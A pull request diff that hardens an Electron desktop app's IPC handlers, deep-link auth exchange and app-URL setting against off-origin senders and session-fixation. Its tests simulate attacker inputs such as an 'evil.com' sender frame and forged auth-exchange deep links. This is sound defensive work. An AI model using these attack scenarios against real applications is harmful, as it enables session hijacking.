### PR TITLE
fix(security): harden Electron navigation, IPC, preload, deep-link

### DIFF
--- a/apps/desktop/src/main/__tests__/auth-exchange-state.test.ts
+++ b/apps/desktop/src/main/__tests__/auth-exchange-state.test.ts
@@ -1,0 +1,123 @@
+import { describe, it, expect, beforeEach } from 'vitest';
+import {
+  AUTH_EXCHANGE_STATE_TTL_MS,
+  generateAuthExchangeState,
+  verifyAuthExchangeState,
+  evaluateAuthExchangeBinding,
+  beginAuthExchangeFlow,
+  peekAuthExchangeState,
+  clearAuthExchangeState,
+} from '../auth-exchange-state';
+
+describe('verifyAuthExchangeState (pure)', () => {
+  it('returns true only for equal non-empty strings', () => {
+    expect(verifyAuthExchangeState('abc123', 'abc123')).toBe(true);
+  });
+
+  it('returns false for mismatched values', () => {
+    expect(verifyAuthExchangeState('abc123', 'abc124')).toBe(false);
+    expect(verifyAuthExchangeState('abc', 'abcd')).toBe(false);
+  });
+
+  it('returns false when either side is empty/null/undefined', () => {
+    expect(verifyAuthExchangeState('', '')).toBe(false);
+    expect(verifyAuthExchangeState('abc', '')).toBe(false);
+    expect(verifyAuthExchangeState('', 'abc')).toBe(false);
+    expect(verifyAuthExchangeState(null, 'abc')).toBe(false);
+    expect(verifyAuthExchangeState('abc', null)).toBe(false);
+    expect(verifyAuthExchangeState(undefined, undefined)).toBe(false);
+  });
+
+  it('is not fooled by type coercion', () => {
+    // @ts-expect-error intentionally passing a non-string
+    expect(verifyAuthExchangeState(123, 123)).toBe(false);
+  });
+});
+
+describe('evaluateAuthExchangeBinding (pure)', () => {
+  it('rejects when no flow is in progress (unsolicited exchange)', () => {
+    expect(evaluateAuthExchangeBinding('anything', null)).toEqual({
+      accepted: false,
+      reason: 'no-flow-in-progress',
+    });
+    expect(evaluateAuthExchangeBinding(null, null)).toEqual({
+      accepted: false,
+      reason: 'no-flow-in-progress',
+    });
+    expect(evaluateAuthExchangeBinding('anything', '')).toEqual({
+      accepted: false,
+      reason: 'no-flow-in-progress',
+    });
+  });
+
+  it('accepts a flow-in-progress exchange that carries no state', () => {
+    expect(evaluateAuthExchangeBinding(null, 'expected-state')).toEqual({
+      accepted: true,
+      reason: 'flow-in-progress-no-state',
+    });
+    expect(evaluateAuthExchangeBinding('', 'expected-state')).toEqual({
+      accepted: true,
+      reason: 'flow-in-progress-no-state',
+    });
+    expect(evaluateAuthExchangeBinding(undefined, 'expected-state')).toEqual({
+      accepted: true,
+      reason: 'flow-in-progress-no-state',
+    });
+  });
+
+  it('accepts a matching state and rejects a mismatched state', () => {
+    expect(evaluateAuthExchangeBinding('s1', 's1')).toEqual({
+      accepted: true,
+      reason: 'state-match',
+    });
+    expect(evaluateAuthExchangeBinding('attacker', 's1')).toEqual({
+      accepted: false,
+      reason: 'state-mismatch',
+    });
+  });
+});
+
+describe('auth-exchange flow store', () => {
+  beforeEach(() => clearAuthExchangeState());
+
+  it('generates high-entropy distinct states', () => {
+    const a = generateAuthExchangeState();
+    const b = generateAuthExchangeState();
+    expect(a).toMatch(/^[0-9a-f]{64}$/);
+    expect(a).not.toEqual(b);
+  });
+
+  it('peek returns null before any flow begins', () => {
+    expect(peekAuthExchangeState()).toBeNull();
+  });
+
+  it('begin stores a state that peek returns within the TTL', () => {
+    const now = 1_000_000;
+    const state = beginAuthExchangeFlow(now);
+    expect(peekAuthExchangeState(now)).toBe(state);
+    expect(peekAuthExchangeState(now + AUTH_EXCHANGE_STATE_TTL_MS - 1)).toBe(state);
+  });
+
+  it('expires the stored state after the TTL', () => {
+    const now = 1_000_000;
+    beginAuthExchangeFlow(now);
+    expect(peekAuthExchangeState(now + AUTH_EXCHANGE_STATE_TTL_MS)).toBeNull();
+    // and stays cleared
+    expect(peekAuthExchangeState(now)).toBeNull();
+  });
+
+  it('clear removes an in-progress flow (single-use consumption)', () => {
+    const now = 1_000_000;
+    beginAuthExchangeFlow(now);
+    clearAuthExchangeState();
+    expect(peekAuthExchangeState(now)).toBeNull();
+  });
+
+  it('begin overwrites any prior flow (last login wins)', () => {
+    const now = 1_000_000;
+    const first = beginAuthExchangeFlow(now);
+    const second = beginAuthExchangeFlow(now);
+    expect(second).not.toBe(first);
+    expect(peekAuthExchangeState(now)).toBe(second);
+  });
+});

--- a/apps/desktop/src/main/__tests__/deep-links.test.ts
+++ b/apps/desktop/src/main/__tests__/deep-links.test.ts
@@ -65,6 +65,10 @@ vi.mock('../logger', () => ({
 }));
 
 import { handleDeepLink } from '../deep-links';
+import {
+  beginAuthExchangeFlow,
+  clearAuthExchangeState,
+} from '../auth-exchange-state';
 
 describe('handleDeepLink dispatcher', () => {
   beforeEach(() => {
@@ -80,6 +84,7 @@ describe('handleDeepLink dispatcher', () => {
       mocks.state.current = mocks.mainWindow;
     });
     mocks.state.current = mocks.mainWindow;
+    clearAuthExchangeState();
   });
 
   afterEach(() => {
@@ -131,7 +136,7 @@ describe('handleDeepLink dispatcher', () => {
   });
 
   describe('given pagespace://auth-exchange (regression)', () => {
-    it('should still POST to /api/auth/desktop/exchange and never broadcast passkey:registered', async () => {
+    it('should still POST to /api/auth/desktop/exchange when a desktop flow is in progress', async () => {
       const fetchSpy = vi.fn(async () => ({
         ok: true,
         json: async () => ({
@@ -142,6 +147,8 @@ describe('handleDeepLink dispatcher', () => {
       }));
       vi.stubGlobal('fetch', fetchSpy);
 
+      // A desktop-initiated login is in progress (e.g. via auth:open-external).
+      beginAuthExchangeFlow();
       await handleDeepLink('pagespace://auth-exchange?code=code123&provider=google');
 
       expect(fetchSpy).toHaveBeenCalledTimes(1);
@@ -151,6 +158,59 @@ describe('handleDeepLink dispatcher', () => {
       );
 
       expect(mocks.webContents.send).not.toHaveBeenCalledWith('passkey:registered');
+    });
+  });
+
+  describe('given pagespace://auth-exchange with no flow in progress (L9 CSRF guard)', () => {
+    it('rejects the unsolicited exchange without making any token request', async () => {
+      const fetchSpy = vi.fn();
+      vi.stubGlobal('fetch', fetchSpy);
+
+      // No beginAuthExchangeFlow() — simulates a drive-by deep link.
+      await handleDeepLink('pagespace://auth-exchange?code=attacker-code&provider=google');
+
+      expect(fetchSpy).not.toHaveBeenCalled();
+      expect(mocks.webContents.send).toHaveBeenCalledWith(
+        'auth-error',
+        expect.objectContaining({ error: expect.stringContaining('blocked') }),
+      );
+    });
+
+    it('rejects an exchange whose state does not match the in-progress flow', async () => {
+      const fetchSpy = vi.fn();
+      vi.stubGlobal('fetch', fetchSpy);
+
+      beginAuthExchangeFlow(); // stored state is random; attacker guesses wrong
+      await handleDeepLink(
+        'pagespace://auth-exchange?code=c&provider=google&state=not-the-real-state',
+      );
+
+      expect(fetchSpy).not.toHaveBeenCalled();
+      expect(mocks.webContents.send).toHaveBeenCalledWith(
+        'auth-error',
+        expect.objectContaining({ error: expect.stringContaining('blocked') }),
+      );
+    });
+
+    it('consumes the flow so a replayed deep link is rejected', async () => {
+      const fetchSpy = vi.fn(async () => ({
+        ok: true,
+        json: async () => ({
+          sessionToken: 'sess_abc',
+          csrfToken: 'csrf_abc',
+          deviceToken: 'dev_abc',
+        }),
+      }));
+      vi.stubGlobal('fetch', fetchSpy);
+
+      beginAuthExchangeFlow();
+      await handleDeepLink('pagespace://auth-exchange?code=code123&provider=google');
+      expect(fetchSpy).toHaveBeenCalledTimes(1);
+
+      // Replay: the flow was single-use, so the second attempt is rejected.
+      fetchSpy.mockClear();
+      await handleDeepLink('pagespace://auth-exchange?code=code123&provider=google');
+      expect(fetchSpy).not.toHaveBeenCalled();
     });
   });
 

--- a/apps/desktop/src/main/__tests__/ipc-handlers.test.ts
+++ b/apps/desktop/src/main/__tests__/ipc-handlers.test.ts
@@ -293,6 +293,28 @@ describe('IPC Handlers', () => {
     });
   });
 
+  describe('mcp:get-config (H5 origin gate — env secrets)', () => {
+    it('returns an empty config to an untrusted sender (no env leak)', async () => {
+      vi.mocked(getAppUrl).mockReturnValue('https://pagespace.ai/dashboard');
+      const handler = getRegisteredHandler('mcp:get-config');
+
+      const result = await handler(untrustedEvent);
+
+      expect(result).toEqual({ mcpServers: {} });
+    });
+  });
+
+  describe('mcp:stop-server (H5 origin gate)', () => {
+    it('refuses to stop a server from an untrusted sender', async () => {
+      vi.mocked(getAppUrl).mockReturnValue('https://pagespace.ai/dashboard');
+      const handler = getRegisteredHandler('mcp:stop-server');
+
+      const result = await handler(untrustedEvent, 'srv');
+
+      expect(result).toEqual({ success: false, error: 'Untrusted sender origin' });
+    });
+  });
+
   describe('auth:open-external', () => {
     it('should open allowed Google OAuth URL', async () => {
       vi.mocked(shell.openExternal).mockResolvedValue(undefined);

--- a/apps/desktop/src/main/__tests__/ipc-handlers.test.ts
+++ b/apps/desktop/src/main/__tests__/ipc-handlers.test.ts
@@ -68,6 +68,8 @@ const trustedEvent = { senderFrame: { url: 'https://pagespace.ai/dashboard' } };
 const untrustedEvent = { senderFrame: { url: 'https://evil.com/x' } };
 // No sender frame at all (fails closed).
 const noFrameEvent = {};
+// Build a sender event whose origin matches a given configured app URL.
+const senderFor = (appUrl: string) => ({ senderFrame: { url: appUrl } });
 
 // Extract handlers from ipcMain.handle mock
 function getRegisteredHandler(channel: string): (...args: unknown[]) => Promise<unknown> {
@@ -97,7 +99,7 @@ describe('IPC Handlers', () => {
         deviceToken: 'ps_dev_test',
       };
 
-      const result = await handler({}, sessionData);
+      const result = await handler(senderFor('https://pagespace.ai/dashboard'), sessionData);
 
       expect(saveAuthSession).toHaveBeenCalledWith(sessionData);
       expect(session.defaultSession.cookies.set).toHaveBeenCalledWith(
@@ -119,7 +121,7 @@ describe('IPC Handlers', () => {
       vi.mocked(getAppUrl).mockReturnValue('https://pagespace.ai/dashboard');
 
       const handler = getRegisteredHandler('auth:store-session');
-      await handler({}, { sessionToken: 'x', csrfToken: 'y', deviceToken: 'z' });
+      await handler(senderFor('https://pagespace.ai/dashboard'), { sessionToken: 'x', csrfToken: 'y', deviceToken: 'z' });
 
       expect(session.defaultSession.cookies.set).toHaveBeenCalledWith(
         expect.objectContaining({ secure: true })
@@ -132,7 +134,7 @@ describe('IPC Handlers', () => {
       vi.mocked(getAppUrl).mockReturnValue('http://pagespace.local:3000/dashboard');
 
       const handler = getRegisteredHandler('auth:store-session');
-      await handler({}, { sessionToken: 'x', csrfToken: 'y', deviceToken: 'z' });
+      await handler(senderFor('http://pagespace.local:3000/dashboard'), { sessionToken: 'x', csrfToken: 'y', deviceToken: 'z' });
 
       expect(session.defaultSession.cookies.set).toHaveBeenCalledWith(
         expect.objectContaining({ secure: false })
@@ -145,7 +147,7 @@ describe('IPC Handlers', () => {
       vi.mocked(getAppUrl).mockReturnValue('http://localhost:3000/dashboard');
 
       const handler = getRegisteredHandler('auth:store-session');
-      await handler({}, { sessionToken: 'x', csrfToken: 'y', deviceToken: 'z' });
+      await handler(senderFor('http://localhost:3000/dashboard'), { sessionToken: 'x', csrfToken: 'y', deviceToken: 'z' });
 
       expect(session.defaultSession.cookies.set).toHaveBeenCalledWith(
         expect.objectContaining({ secure: false })
@@ -155,15 +157,31 @@ describe('IPC Handlers', () => {
     it('should still succeed if cookie setting fails (non-blocking)', async () => {
       vi.mocked(saveAuthSession).mockResolvedValue(undefined);
       vi.mocked(session.defaultSession.cookies.set).mockRejectedValue(new Error('Cookie error'));
+      vi.mocked(getAppUrl).mockReturnValue('https://pagespace.ai/dashboard');
 
       const handler = getRegisteredHandler('auth:store-session');
-      const result = await handler({}, {
+      const result = await handler(senderFor('https://pagespace.ai/dashboard'), {
         sessionToken: 'ps_sess_x',
         csrfToken: 'csrf_x',
         deviceToken: 'ps_dev_x',
       });
 
       expect(result).toEqual({ success: true });
+    });
+
+    it('refuses to store a session from an untrusted sender (no injection)', async () => {
+      vi.mocked(getAppUrl).mockReturnValue('https://pagespace.ai/dashboard');
+
+      const handler = getRegisteredHandler('auth:store-session');
+      const result = await handler(untrustedEvent, {
+        sessionToken: 'attacker',
+        csrfToken: 'x',
+        deviceToken: 'y',
+      });
+
+      expect(result).toEqual({ success: false });
+      expect(saveAuthSession).not.toHaveBeenCalled();
+      expect(session.defaultSession.cookies.set).not.toHaveBeenCalled();
     });
   });
 

--- a/apps/desktop/src/main/__tests__/ipc-handlers.test.ts
+++ b/apps/desktop/src/main/__tests__/ipc-handlers.test.ts
@@ -30,7 +30,7 @@ vi.mock('node:os', () => ({
   release: vi.fn(() => '25.0'),
 }));
 
-vi.mock('../store', () => ({ store: {} }));
+vi.mock('../store', () => ({ store: { set: vi.fn() } }));
 vi.mock('../app-url', () => ({ getAppUrl: vi.fn(() => 'https://pagespace.ai/dashboard') }));
 vi.mock('../state', () => ({
   mainWindow: null,
@@ -54,7 +54,20 @@ vi.mock('../mcp-status', () => ({ triggerMCPStatusBroadcast: vi.fn() }));
 import { ipcMain, session, shell } from 'electron';
 import { saveAuthSession } from '../auth-storage';
 import { getAppUrl } from '../app-url';
+import { store } from '../store';
+import { getOrLoadSession } from '../auth-session';
 import { registerIPCHandlers } from '../ipc-handlers';
+
+// The handler persists via an `as any` cast on the store; the real type does
+// not expose `set`, so reach the mock through a narrow cast in the test.
+const mockedStoreSet = (store as unknown as { set: ReturnType<typeof vi.fn> }).set;
+
+// A sender frame on the trusted app origin.
+const trustedEvent = { senderFrame: { url: 'https://pagespace.ai/dashboard' } };
+// A sender frame on a foreign origin (e.g. after an off-origin navigation).
+const untrustedEvent = { senderFrame: { url: 'https://evil.com/x' } };
+// No sender frame at all (fails closed).
+const noFrameEvent = {};
 
 // Extract handlers from ipcMain.handle mock
 function getRegisteredHandler(channel: string): (...args: unknown[]) => Promise<unknown> {
@@ -151,6 +164,114 @@ describe('IPC Handlers', () => {
       });
 
       expect(result).toEqual({ success: true });
+    });
+  });
+
+  describe('set-app-url (H5 allowlist + origin gate)', () => {
+    it('stores an allowlisted app URL from a trusted sender', async () => {
+      vi.mocked(getAppUrl).mockReturnValue('https://pagespace.ai/dashboard');
+      const handler = getRegisteredHandler('set-app-url');
+
+      const result = await handler(trustedEvent, 'https://pagespace.ai/dashboard');
+
+      expect(result).toBe(true);
+      expect(mockedStoreSet).toHaveBeenCalledWith('appUrl', 'https://pagespace.ai/dashboard');
+    });
+
+    it('rejects a non-allowlisted URL without storing it', async () => {
+      vi.mocked(getAppUrl).mockReturnValue('https://pagespace.ai/dashboard');
+      const handler = getRegisteredHandler('set-app-url');
+
+      const result = await handler(trustedEvent, 'https://evil.com/phish');
+
+      expect(result).toBe(false);
+      expect(mockedStoreSet).not.toHaveBeenCalled();
+    });
+
+    it('rejects any set-app-url from an untrusted sender', async () => {
+      vi.mocked(getAppUrl).mockReturnValue('https://pagespace.ai/dashboard');
+      const handler = getRegisteredHandler('set-app-url');
+
+      const result = await handler(untrustedEvent, 'https://pagespace.ai/dashboard');
+
+      expect(result).toBe(false);
+      expect(mockedStoreSet).not.toHaveBeenCalled();
+    });
+
+    it('allows the currently-configured (env) origin even if not static', async () => {
+      vi.mocked(getAppUrl).mockReturnValue('https://app.example.com/dashboard');
+      const handler = getRegisteredHandler('set-app-url');
+
+      const result = await handler(
+        { senderFrame: { url: 'https://app.example.com/dashboard' } },
+        'https://app.example.com/dashboard',
+      );
+
+      expect(result).toBe(true);
+      expect(mockedStoreSet).toHaveBeenCalledWith('appUrl', 'https://app.example.com/dashboard');
+    });
+  });
+
+  describe('auth:get-session-token (H5 origin gate)', () => {
+    it('returns the token to a trusted sender', async () => {
+      vi.mocked(getAppUrl).mockReturnValue('https://pagespace.ai/dashboard');
+      vi.mocked(getOrLoadSession).mockResolvedValue({ sessionToken: 'ps_sess_secret' } as never);
+      const handler = getRegisteredHandler('auth:get-session-token');
+
+      const result = await handler(trustedEvent);
+
+      expect(result).toBe('ps_sess_secret');
+    });
+
+    it('returns null to an untrusted sender (token never leaves)', async () => {
+      vi.mocked(getAppUrl).mockReturnValue('https://pagespace.ai/dashboard');
+      vi.mocked(getOrLoadSession).mockResolvedValue({ sessionToken: 'ps_sess_secret' } as never);
+      const handler = getRegisteredHandler('auth:get-session-token');
+
+      const result = await handler(untrustedEvent);
+
+      expect(result).toBeNull();
+      expect(vi.mocked(getOrLoadSession)).not.toHaveBeenCalled();
+    });
+
+    it('fails closed when the sender frame is unknown', async () => {
+      vi.mocked(getAppUrl).mockReturnValue('https://pagespace.ai/dashboard');
+      const handler = getRegisteredHandler('auth:get-session-token');
+
+      const result = await handler(noFrameEvent);
+
+      expect(result).toBeNull();
+    });
+  });
+
+  describe('auth:begin-exchange (L9)', () => {
+    it('returns a fresh opaque state to a trusted sender', async () => {
+      vi.mocked(getAppUrl).mockReturnValue('https://pagespace.ai/dashboard');
+      const handler = getRegisteredHandler('auth:begin-exchange');
+
+      const result = await handler(trustedEvent);
+
+      expect(result).toMatch(/^[0-9a-f]{64}$/);
+    });
+
+    it('refuses an untrusted sender', async () => {
+      vi.mocked(getAppUrl).mockReturnValue('https://pagespace.ai/dashboard');
+      const handler = getRegisteredHandler('auth:begin-exchange');
+
+      const result = await handler(untrustedEvent);
+
+      expect(result).toBeNull();
+    });
+  });
+
+  describe('mcp:execute-tool (H5 origin gate)', () => {
+    it('refuses execution from an untrusted sender', async () => {
+      vi.mocked(getAppUrl).mockReturnValue('https://pagespace.ai/dashboard');
+      const handler = getRegisteredHandler('mcp:execute-tool');
+
+      const result = await handler(untrustedEvent, 'srv', 'tool', {});
+
+      expect(result).toEqual({ success: false, error: 'Untrusted sender origin' });
     });
   });
 

--- a/apps/desktop/src/main/auth-exchange-state.ts
+++ b/apps/desktop/src/main/auth-exchange-state.ts
@@ -1,0 +1,115 @@
+/**
+ * Auth-exchange CSRF / session-fixation binding (security finding L9).
+ *
+ * The `pagespace://auth-exchange?code=...` deep link previously adopted any
+ * code with no proof that THIS app instance started the login. Any local app or
+ * web page could drive the desktop into an attacker-supplied session.
+ *
+ * This module binds the exchange to an app-instance auth flow:
+ *  - `beginAuthExchangeFlow()` is called at the start of a desktop-initiated
+ *    login (the renderer / open-external handoff). It records a single-use,
+ *    TTL-bounded random `state`.
+ *  - `verifyAuthExchangeState` / `evaluateAuthExchangeBinding` are PURE decision
+ *    helpers (exhaustively unit-tested) that decide whether an incoming deep
+ *    link may proceed.
+ *  - The deep-link handler consumes the stored state and rejects exchanges that
+ *    arrive with no flow in progress (the unsolicited-CSRF case) or with a
+ *    non-matching state.
+ */
+
+import { randomBytes } from 'node:crypto';
+
+/** How long a begun auth flow stays valid (ms). Exceeds the 5-minute server
+ * exchange-code TTL so a legitimately slow login is not rejected. */
+export const AUTH_EXCHANGE_STATE_TTL_MS = 10 * 60 * 1000;
+
+interface PendingAuthExchange {
+  state: string;
+  expiresAt: number;
+}
+
+let pending: PendingAuthExchange | null = null;
+
+/** Generate a high-entropy, opaque state value. */
+export function generateAuthExchangeState(): string {
+  return randomBytes(32).toString('hex');
+}
+
+/**
+ * PURE. Constant-length-ish equality of two state values. Both must be present,
+ * equal-length, non-empty strings. Returns false for any null/empty/mismatch.
+ */
+export function verifyAuthExchangeState(
+  received: string | null | undefined,
+  expected: string | null | undefined,
+): boolean {
+  if (typeof received !== 'string' || typeof expected !== 'string') return false;
+  if (received.length === 0 || expected.length === 0) return false;
+  if (received.length !== expected.length) return false;
+  let diff = 0;
+  for (let i = 0; i < received.length; i++) {
+    diff |= received.charCodeAt(i) ^ expected.charCodeAt(i);
+  }
+  return diff === 0;
+}
+
+export interface AuthExchangeDecision {
+  accepted: boolean;
+  reason:
+    | 'no-flow-in-progress'
+    | 'flow-in-progress-no-state'
+    | 'state-match'
+    | 'state-mismatch';
+}
+
+/**
+ * PURE. Decide whether an auth-exchange deep link may proceed.
+ *
+ * - No flow in progress (expected is null): REJECT — closes the unsolicited
+ *   drive-by CSRF / session-fixation case.
+ * - Flow in progress, deep link carries no state: ACCEPT — preserves current
+ *   server-issued flows that do not yet echo the desktop state, while still
+ *   requiring a desktop-initiated flow.
+ * - Flow in progress, deep link carries a state: ACCEPT iff it matches —
+ *   strong binding once producers echo the state.
+ */
+export function evaluateAuthExchangeBinding(
+  received: string | null | undefined,
+  expected: string | null | undefined,
+): AuthExchangeDecision {
+  if (typeof expected !== 'string' || expected.length === 0) {
+    return { accepted: false, reason: 'no-flow-in-progress' };
+  }
+  if (received === null || received === undefined || received === '') {
+    return { accepted: true, reason: 'flow-in-progress-no-state' };
+  }
+  return verifyAuthExchangeState(received, expected)
+    ? { accepted: true, reason: 'state-match' }
+    : { accepted: false, reason: 'state-mismatch' };
+}
+
+/**
+ * Begin a desktop-initiated auth flow. Records a fresh single-use state with a
+ * TTL and returns it so the caller may forward it to the server (for the strong
+ * binding once producers echo it back).
+ */
+export function beginAuthExchangeFlow(now: number = Date.now()): string {
+  const state = generateAuthExchangeState();
+  pending = { state, expiresAt: now + AUTH_EXCHANGE_STATE_TTL_MS };
+  return state;
+}
+
+/** Read the currently-expected state, or null if none / expired. */
+export function peekAuthExchangeState(now: number = Date.now()): string | null {
+  if (!pending) return null;
+  if (now >= pending.expiresAt) {
+    pending = null;
+    return null;
+  }
+  return pending.state;
+}
+
+/** Clear any in-progress flow (single-use consumption / explicit reset). */
+export function clearAuthExchangeState(): void {
+  pending = null;
+}

--- a/apps/desktop/src/main/deep-links.ts
+++ b/apps/desktop/src/main/deep-links.ts
@@ -7,6 +7,11 @@ import { getAppUrl } from './app-url';
 import { logger } from './logger';
 import { handlePasskeyRegistered as handlePasskeyRegisteredPure } from './passkey-deep-link';
 import { createWindow } from './window';
+import {
+  evaluateAuthExchangeBinding,
+  peekAuthExchangeState,
+  clearAuthExchangeState,
+} from './auth-exchange-state';
 
 export function setupProtocolClient(): void {
   if (process.defaultApp) {
@@ -31,12 +36,32 @@ async function handleAuthExchange(url: string): Promise<boolean> {
     const code = urlObj.searchParams.get('code');
     const provider = urlObj.searchParams.get('provider') || 'unknown';
     const isNewUser = urlObj.searchParams.get('isNewUser') === 'true';
+    const receivedState = urlObj.searchParams.get('state');
 
     if (!code) {
       logger.error('[Auth Exchange] Missing code in deep link');
       mainWindow?.webContents.send('auth-error', { error: 'Missing exchange code' });
       return true;
     }
+
+    // CSRF / session-fixation guard (security finding L9): only honor an
+    // exchange that this app instance actually started. An unsolicited deep
+    // link (no auth flow in progress) — or one whose state does not match the
+    // in-progress flow — is rejected before any token-bearing request is made.
+    const expectedState = peekAuthExchangeState();
+    const decision = evaluateAuthExchangeBinding(receivedState, expectedState);
+    if (!decision.accepted) {
+      logger.warn('[Auth Exchange] Rejected unbound exchange deep link', {
+        provider,
+        reason: decision.reason,
+      });
+      mainWindow?.webContents.send('auth-error', {
+        error: 'Unexpected sign-in request was blocked',
+      });
+      return true;
+    }
+    // Single-use: consume the in-progress flow now that it is accepted.
+    clearAuthExchangeState();
 
     logger.info('[Auth Exchange] Processing OAuth exchange', { provider });
 

--- a/apps/desktop/src/main/ipc-handlers.ts
+++ b/apps/desktop/src/main/ipc-handlers.ts
@@ -13,13 +13,53 @@ import { getMachineIdentifier, getOrLoadSession } from './auth-session';
 import { getPowerState } from './power-monitor';
 import { triggerMCPStatusBroadcast } from './mcp-status';
 import type { MCPConfig } from '../shared/mcp-types';
+import {
+  ALLOWED_APP_ORIGINS,
+  isAllowedAppUrl,
+  isTrustedSenderUrl,
+} from '../shared/navigation-guard';
+import { beginAuthExchangeFlow } from './auth-exchange-state';
 
 const storeAsAny = store as any;
+
+/**
+ * True when the IPC was sent by a frame on the trusted app origin (security
+ * finding H5). Capability-bearing bridge calls (raw session token, MCP exec,
+ * set-app-url) must answer only the trusted origin so an off-origin document
+ * cannot abuse the preload bridge. Fails closed when the sender URL is unknown.
+ */
+function isTrustedSender(event: Electron.IpcMainInvokeEvent): boolean {
+  let appOrigin: string;
+  try {
+    appOrigin = new URL(getAppUrl()).origin;
+  } catch {
+    return false;
+  }
+  return isTrustedSenderUrl(event.senderFrame?.url, appOrigin);
+}
 
 export function registerIPCHandlers(): void {
   ipcMain.handle('get-app-url', () => getAppUrl());
 
-  ipcMain.handle('set-app-url', (_event, url: string) => {
+  ipcMain.handle('set-app-url', (event, url: string) => {
+    if (!isTrustedSender(event)) {
+      console.warn('[IPC] Blocked set-app-url from untrusted sender');
+      return false;
+    }
+    // Allowlist-validate the target (security finding H5): never let the
+    // renderer persist an arbitrary origin that the shell would load on the
+    // next launch. The currently-configured origin is included so an
+    // env-configured deployment keeps working.
+    let allowlist: readonly string[] = ALLOWED_APP_ORIGINS;
+    try {
+      allowlist = [...ALLOWED_APP_ORIGINS, new URL(getAppUrl()).origin];
+    } catch {
+      // fall back to the static allowlist
+    }
+    if (typeof url !== 'string' || !isAllowedAppUrl(url, allowlist)) {
+      console.warn('[IPC] Blocked set-app-url for non-allowlisted URL:', url);
+      return false;
+    }
     storeAsAny.set('appUrl', url);
     return true;
   });
@@ -41,14 +81,34 @@ export function registerIPCHandlers(): void {
     return mainWindow?.isMaximized() ?? false;
   });
 
-  ipcMain.handle('auth:get-session-token', async () => {
+  ipcMain.handle('auth:get-session-token', async (event) => {
+    if (!isTrustedSender(event)) {
+      console.warn('[IPC] Blocked auth:get-session-token from untrusted sender');
+      return null;
+    }
     const session = await getOrLoadSession();
     return session?.sessionToken ?? null;
   });
 
-  ipcMain.handle('auth:get-session', async () => {
+  ipcMain.handle('auth:get-session', async (event) => {
+    if (!isTrustedSender(event)) {
+      console.warn('[IPC] Blocked auth:get-session from untrusted sender');
+      return null;
+    }
     const session = await getOrLoadSession();
     return session ?? null;
+  });
+
+  // Begin a desktop-initiated auth flow (security finding L9). Records a
+  // single-use, TTL-bounded state so a subsequent pagespace://auth-exchange
+  // deep link can be bound to a login this instance actually started. Returns
+  // the state so the caller can forward it to the server for strong binding.
+  ipcMain.handle('auth:begin-exchange', (event) => {
+    if (!isTrustedSender(event)) {
+      console.warn('[IPC] Blocked auth:begin-exchange from untrusted sender');
+      return null;
+    }
+    return beginAuthExchangeFlow();
   });
 
   ipcMain.handle('auth:store-session', async (_event, sessionData: StoredAuthSession) => {
@@ -139,6 +199,9 @@ export function registerIPCHandlers(): void {
         console.warn('[Auth IPC] Blocked open-external for URL not in allowlist:', parsed.hostname, parsed.pathname);
         return { success: false, error: `URL "${parsed.hostname}${parsed.pathname}" is not allowed` };
       }
+      // This is a desktop-initiated login: mark an auth flow in progress so the
+      // returning pagespace://auth-exchange deep link is bound to it (L9).
+      beginAuthExchangeFlow();
       await shell.openExternal(url);
       return { success: true };
     } catch (error) {
@@ -155,8 +218,12 @@ export function registerIPCHandlers(): void {
     return config;
   });
 
-  ipcMain.handle('mcp:update-config', async (_event, config: MCPConfig) => {
+  ipcMain.handle('mcp:update-config', async (event, config: MCPConfig) => {
     logger.debug('mcp:update-config handler called', {});
+    if (!isTrustedSender(event)) {
+      console.warn('[IPC] Blocked mcp:update-config from untrusted sender');
+      return { success: false, error: 'Untrusted sender origin' };
+    }
     const mcpManager = getMCPManager();
     try {
       logger.debug('Received config from renderer', { config });
@@ -171,7 +238,11 @@ export function registerIPCHandlers(): void {
     }
   });
 
-  ipcMain.handle('mcp:start-server', async (_event, name: string) => {
+  ipcMain.handle('mcp:start-server', async (event, name: string) => {
+    if (!isTrustedSender(event)) {
+      console.warn('[IPC] Blocked mcp:start-server from untrusted sender');
+      return { success: false, error: 'Untrusted sender origin' };
+    }
     const mcpManager = getMCPManager();
     try {
       await mcpManager.startServer(name);
@@ -191,7 +262,11 @@ export function registerIPCHandlers(): void {
     }
   });
 
-  ipcMain.handle('mcp:restart-server', async (_event, name: string) => {
+  ipcMain.handle('mcp:restart-server', async (event, name: string) => {
+    if (!isTrustedSender(event)) {
+      console.warn('[IPC] Blocked mcp:restart-server from untrusted sender');
+      return { success: false, error: 'Untrusted sender origin' };
+    }
     const mcpManager = getMCPManager();
     try {
       await mcpManager.restartServer(name);
@@ -218,7 +293,11 @@ export function registerIPCHandlers(): void {
     }
   });
 
-  ipcMain.handle('mcp:execute-tool', async (_event, serverName: string, toolName: string, args: Record<string, unknown>) => {
+  ipcMain.handle('mcp:execute-tool', async (event, serverName: string, toolName: string, args: Record<string, unknown>) => {
+    if (!isTrustedSender(event)) {
+      console.warn('[IPC] Blocked mcp:execute-tool from untrusted sender');
+      return { success: false, error: 'Untrusted sender origin' };
+    }
     try {
       logger.debug('Executing tool', { serverName, toolName });
       const mcpManager = getMCPManager();

--- a/apps/desktop/src/main/ipc-handlers.ts
+++ b/apps/desktop/src/main/ipc-handlers.ts
@@ -111,7 +111,14 @@ export function registerIPCHandlers(): void {
     return beginAuthExchangeFlow();
   });
 
-  ipcMain.handle('auth:store-session', async (_event, sessionData: StoredAuthSession) => {
+  ipcMain.handle('auth:store-session', async (event, sessionData: StoredAuthSession) => {
+    // Writing a session into native secure storage + the cookie jar is the most
+    // capability-bearing bridge call — restrict it to the trusted origin so an
+    // off-origin document cannot inject an attacker session (H5).
+    if (!isTrustedSender(event)) {
+      console.warn('[Auth IPC] Blocked auth:store-session from untrusted sender');
+      return { success: false };
+    }
     await saveAuthSession(sessionData);
 
     // Also set the session cookie on the BrowserWindow's session
@@ -135,7 +142,11 @@ export function registerIPCHandlers(): void {
     return { success: true };
   });
 
-  ipcMain.handle('auth:clear-auth', async () => {
+  ipcMain.handle('auth:clear-auth', async (event) => {
+    if (!isTrustedSender(event)) {
+      console.warn('[Auth IPC] Blocked auth:clear-auth from untrusted sender');
+      return;
+    }
     try {
       await clearAuthSession();
       await session.defaultSession.clearStorageData({

--- a/apps/desktop/src/main/ipc-handlers.ts
+++ b/apps/desktop/src/main/ipc-handlers.ts
@@ -221,8 +221,14 @@ export function registerIPCHandlers(): void {
     }
   });
 
-  ipcMain.handle('mcp:get-config', async () => {
+  ipcMain.handle('mcp:get-config', async (event) => {
     logger.debug('mcp:get-config handler called', {});
